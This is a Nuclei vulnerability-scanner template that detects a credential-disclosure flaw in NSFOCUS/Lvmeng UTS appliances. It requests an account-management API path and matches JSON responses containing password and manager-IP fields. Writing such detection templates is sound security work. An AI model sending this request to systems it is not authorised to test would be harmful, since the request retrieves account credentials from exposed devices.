nuclei-templates/exposures/configs/lvmeng-uts-disclosure.yaml

32 lines
602 B
YAML
Raw Normal View History

2021-02-13 07:13:02 +00:00
id: lvmeng-uts-disclosure
info:
name: Lvmeng UTS Disclosure
2021-02-13 09:48:52 +00:00
author: pikpikcu
severity: high
2021-02-13 07:13:02 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/webapi/v1/system/accountmanage/account"
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "password"
- "nsfocus_uts"
- "MANAGER_IP"
condition: and
part: body